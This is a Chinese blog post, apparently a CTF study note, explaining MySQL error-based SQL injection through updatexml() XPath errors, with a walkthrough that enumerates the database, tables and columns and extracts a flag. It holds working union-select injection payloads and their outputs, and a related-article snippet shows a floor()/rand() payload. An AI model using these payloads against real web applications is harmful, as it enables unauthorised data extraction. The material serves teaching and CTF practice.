[WEB安全/SQL注入]SQLI报错注入原理分析和总结

最新推荐文章于 2024-01-22 20:13:42 发布
最新推荐文章于 2024-01-22 20:13:42 发布
阅读量479 收藏 2
点赞数
分类专栏: # Web安全 文章标签: mysql sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DARKNOTES/article/details/106450896
版权

报错注入

报错注入特征

在前端回显包含查询报错信息,而不直接显示查询的内容。

原理

1.SQL(5.1以上版本)支持Xpath语法,合法的XPATH语法(详见XPATH语法):
在这里插入图片描述

2.当服务器在前端不回显查询到的信息,但是回显执行的报错信息时,我们通过xpath的函数在报错中创造窗口。

SELECT updatexml(1,concat(0x7e,(show databases),0x7e),1)

将查询语句提交到数据库应用上,concat()将三个参数合并为一个字符串(便于定位和报错),利用这种不符合Xpath的格式,可以的到报错的窗口。

我们通常见到的报错是一下格式:

ERROR 1105 (HY000): XPATH syntax error: '~db~'

在concat对三个参数连接前,SQL语句部分会被先行解析为查询结果,实际参与连接的为被替换后的回显结果,再利用前端回显得到报错,可以得到包含查询结果的报错信息,余下的就是注入的标准流程了,具体操作因选择的不同函数而不同。

updatexml(1,concat(0x7e,(回显窗口),0x7e),1)

3.UPDATEXML()函数的介绍[只供了解]

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc。

第二个参数:XPath_string (Xpath格式的字符串) ,不符合要求则报错。

第三个参数:new_value,String格式,替换查找到的符合条件的数据。

用途:改变文档中符合条件的节点的值。

改变XML_document中符合XPATH_string的值。

流程

查询窗口数量
1 order by 2
爆库
1 union select 1,updatexml(1,concat(0x7e,database(),0x7e),1)

查询错误: XPATH syntax error: '~sqli~'
爆表
1 union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

查询错误: XPATH syntax error: '~news,flag~'
爆字段
1 union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'),0x7e),1)

查询错误: XPATH syntax error: '~flag~'
查询结果
1 union select 1,updatexml(1,concat(0x7e,(select flag from flag),0x7e),1)

查询错误: XPATH syntax error: '~ctfhub{49667c5f4c894ba4f577ca63'

【这里很明显没有字符串的右半边,因为他的回显是有长度限制的(32个字符)】

我们再利用substr,left ,mid ,和right函数这一类的函数,得到我们想要的。

1 union select 1,updatexml(1,concat(0x7e,right((select flag from flag),31),0x7e),1)

查询错误: XPATH syntax error: '~894ba4f577ca63b9e7b23b30111794}'

得到后半段,拼接,去重,就是flag.

ctfhub{49667c5f4c894ba4f577ca63b9e7b23b30111794}

字符串截取函数总结

SELECT LEFT(字符串或字段名,长度) 【串参数可以是CHAR或BINARY STRING】
SELECT RIGHT(字符串或字段名,长度) 
SELECT SUBSTR(字符串或字段名,截取开始位置,截取长度)  
								【Mysql:substr()《=》substring()】
SELECT MID(字符串或字段名,起始位置[,长度])

可写自动化脚本,考虑到以后爆的数据不会像FLAG这样短。SUBSTR更灵活。

其他报错注入的方案

floor,ExtractValue,UpdateXml,NAME_CONST,join,exp,GeometryCollection(),polygon (),multipoint (),multlinestring (),multpolygon (),linestring ()

过滤严重情况下,可利用join进行无列名注入,详见本人CISCN2021初赛-WEB部分

車鈊
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国信安web安全——SQLi漏洞(一)
学习记录
02-28 580
一、熟悉SQL注入基础 (1)order by (2)Union (3)version() (4)database() (5)concat() (6)Concat_ws() (7)group_concat() (8)information_schema库 二、SQLi漏洞概念 SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于
SQL报错注入
qq_36760683的博客
05-07 1000
SQL报错注入:原文链接: http://wyb0.com/posts/injection-of-error-based/============================================================================一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用,它的特点是注入速度快,但是语句较复...
sql报错注入
Ran_799的博客
07-10 373
简单的sql报错注入笔记
web 知识点专题(SQLi)
crispr的博客
12-06 310
CTF知识点个人总结WEB SQLI 前言 information_schema的表tables中的列table_schema记录了所有数据库的名字 information_schema的表tables中的列table_name记录了所有数据库的表的名字 information_schema的表columns中的列table_schema记录了所有数据库的名字 informa...
Web安全-SQL注入sqli靶场第11-14关】(三)
12-11 1029
Web安全-SQL注入sqli靶场第11-14关】
Sqli注入Web测试环境.zip
02-13
这个"Sqli注入Web测试环境.zip"是一个专为测试和学习SQL注入漏洞而设计的靶场。靶场提供了实践和理解SQL注入攻击以及如何防御它们的机会。 首先,你需要一个Web服务器环境来运行这个靶场。这可能包括Apache、Nginx...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 ...通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli手册,学习sql注入必备
07-26
总结来说,"sqli手册"是一个全面学习SQL注入的宝贵资源,不仅教授了如何利用SQL注入进行攻击,更重要的是,它教导我们如何防止这类攻击,这对于Web开发人员和安全专家来说都是不可或缺的知识。通过这本书,你可以...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group by和rand()函数联用来进行报错注入。报错原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 330
个人CTF学习之路
Web安全漏洞专项靶场—SQL注入—docker环境—sqli-labs靶场—详细通关指南
最新发布
qq_38678845的博客
01-22 1986
Web安全SQL注入漏洞的专项训练
Only constant XPATH queries are supported
weixin_43403663的博客
11-21 728
Only constant XPATH queries are supported
mysql floor报错_mysql数据库注入floor报错
weixin_42628941的博客
01-27 262
1、通过floor报错可以通过如下一些利用代码and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);and (select count(*) from (select 1 union select null union s...
mysql写入微信用户信息时报错:SQLSTATE[HY000]: General error
weixin_33896069的博客
07-12 1014
2019独角兽企业重金招聘Python工程师标准>>> ...
WebSql用法(自我记录)
吹口哨的兔子
07-03 5159
websql主要是依托浏览器环境下一种离线存储方式,主要是用于关系性数据库,与sqllite相似判断浏览器是否支持if(window.openDatabase){ console.log(“浏览器支持DataBase”); }创建、打开数据库1、openDatabase 参数说明数据库名称版本号数据库别名或者是介绍数据库大小数据库创建成功回调函数(可为空)数据库创建失败的回调函数(可为空...
解决mysql死锁错误 SQLSTATE[HY000]: General error: 1205 Lock wait timeout exceeded; try restart
热门推荐
flysnownet的博客
05-07 3万+
在PHP调试时 提交事务触发异常后没有执行回滚导致mysql死锁,以致后续请求更新不了数据 问题出现环境: 1、在同一事务内先后对同一条数据进行插入和更新操作; 2、多台服务器操作同一数据库; 3、瞬时出现高并发现象; 异常信息 SQLSTATE[HY000]: General error: 1205 Lock wait timeout exceeded; try restar...
TP操作数据库操作报错 SQLSTATE[HY000]: General error 2503
夜之寐 的技术博客
04-11 9697
SQLSTATE[HY000]: General error 2503 这个错误是 由于$this->query引起的,在3.2.3版本下读写操作要query和execute方法分开调用,否则调试模式下面会报错 由于TP框架在3.2.3之后,要求读写操作使用不同的方法调用,如果错误使用了,则在非调试模式下会报错。 读数据使用 $this->query 写数据使用 $this-&g...
Web安全初探:SQL注入与漏洞分析
SQL注入分析中,课件解释了注入原理,即用户通过GET或POST方法传递参数到服务器,如果这些参数没有得到适当的验证和清理,就可能导致SQL注入。通过使用像Burp Suite这样的工具,可以分析参数传递的过程,帮助...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值